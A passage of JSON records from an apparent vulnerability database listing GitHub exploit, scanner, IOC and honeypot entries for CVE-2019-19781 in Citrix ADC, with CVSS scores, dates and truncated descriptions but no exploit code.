"CA1AFE75-C90A-5C21-92B0-FC1C0282B767", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-24T16:52:14", "description": "# CVE-2019-19781\n\nThis was only uploaded due to other researcher...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-11T00:08:27", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-06-24T03:52:03", "id": "3AEA79E9-5CA7-5210-9CAC-5E34F8E0C418", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:28:51", "description": "# citrix.sh\nCVE-2019-19781...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-20T15:30:30", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-07-19T01:10:14", "id": "27F3F58D-9FEF-5F4F-91FB-0D93B481FBA4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:28:55", "description": "# citrix_dir_traversal_rce\n\nA directory traversal was discovered...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-13T14:07:15", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-04-05T04:22:21", "id": "9A29EBA1-E786-5DD5-B661-E0080DEEB613", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-22T13:39:34", "description": "# CVE-2019-19781\nRemote Code Execution Exploit for Citrix Applic...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-10T22:56:35", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-07-22T11:43:10", "id": "5DD13827-3FCE-5166-806D-088441D41514", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-16T21:34:51", "description": "# CVE-2019-19781 citrixmash scanner\n\nA multithreaded scanner for...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-12T15:16:54", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-06-16T20:16:19", "id": "39093366-D071-5898-A67D-A99B956B6E73", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:28:58", "description": "# CVE-2019-19781\nCVE-2019-19781 Attack Triage Script\n\nThe script...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-17T16:14:30", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-21T16:48:21", "id": "ACE1EC69-37E6-58A5-8C0B-96212CDB38DF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:29:04", "description": "# Detect-CVE-2019-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-16T10:09:05", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-16T10:35:07", "id": "45A4CAC6-39DD-5F6D-B0C4-9688EF931746", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:29:08", "description": "# CVE-2019-19781_IOCs\nIOCs for CVE-2019-19781\n\ncitrixhoneypotnsl...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-15T19:32:14", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-15T19:37:59", "id": "EAFD9DBC-1E36-570B-9F48-8C355BBFD8E6", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-27T21:29:49", "description": "# Honepot for CVE-2019-19781 (Citrix ADC)\nDetect and log CVE-201...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-13T10:09:31", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-07-27T07:11:27", "id": "EE4C8DE4-3366-58B0-9494-7FD5B6F9D0EF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:29:12", "description": "# CVE-2019-19781-Checker\nCheck your website for CVE-2019-19781 V...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-15T10:15:11", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-15T10:20:33", "id": "721C46F4-C390-5D23-B358-3D4B22959428", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:29:18", "description": "# CVE-2019-19781\r\nAutomated script for Citrix ADC scanner ([CVE-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-13T07:42:27", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-02-26T19:27:56", "id": "1F74FB7B-4F6B-51C6-9117-E7A9750D027D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-21T04:32:15", "description": "# CVE-2019-19781 Citrix ADC Remote Code Execution\n\n![](./CVE-201...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-11T03:10:12", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-07-21T03:53:26", "id": "CA7DF0EF-7032-54E3-B16E-D0845CE73845", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:29:34", "description": "# CVE-2019-19781\nCitr...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-11T13:05:28", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-09-17T11:46:50", "id": "E3D6A7AD-AC9C-55EB-A993-B78D05403B54", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-20T15:02:06", "description": "# CVE-2019-19781\n\n\u652f\u6301\u6279\u91cf\u68c0\u6d4b\n\nUsage:\n\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-10T02:05:51", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-07-20T11:41:57", "id": "CF9EC818-A904-586C-9C19-3B4F04770FBD", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-20T23:15:01", "description": "# CVE-2019-19781\nRemote Code Execution Exploit for C...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-11T07:16:23", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-07-20T22:46:29", "id": "988A0BAB-669A-57AE-B432-564B2E378252", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:30:12", "description": "# CVE-2019-19781\n\nCVE-2019-19781 Module for [Router Scan Project...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-26T08:00:22", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-05-26T08:05:13", "id": "306622D1-6E5F-53BE-AE3D-A17E5DAC3F50", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T13:54:10", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-08T10:42:20", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-11-28T06:33:59", "id": "3BFD8B83-5790-508D-8B9C-58C171517BD0", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:32:49", "description": "# CVE-NetScalerFileSystemCheck\r\nThis script checks the Citrix Ne...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-16T08:52:14", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-06-21T13:40:35", "id": "6787DC40-24C2-5626-B213-399038EFB0E9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:29:48", "description": "# CVE-2019-19781\n\u6279\u91cf\u6982\u5ff5\u9a57\u8b49\u7528\n\u4f7f\u7528\u9650\u5236\n----------------------...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-17T06:09:18", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-17T06:23:10", "id": "1AAD4FCC-D02C-52F0-ADA8-410D1B99297C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-16T12:29:54", "description": "# check-cve-2019-19781 \ud83d\udd0e\ud83d\udc1e #\n\n[![GitHub Build Status](https://git...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": 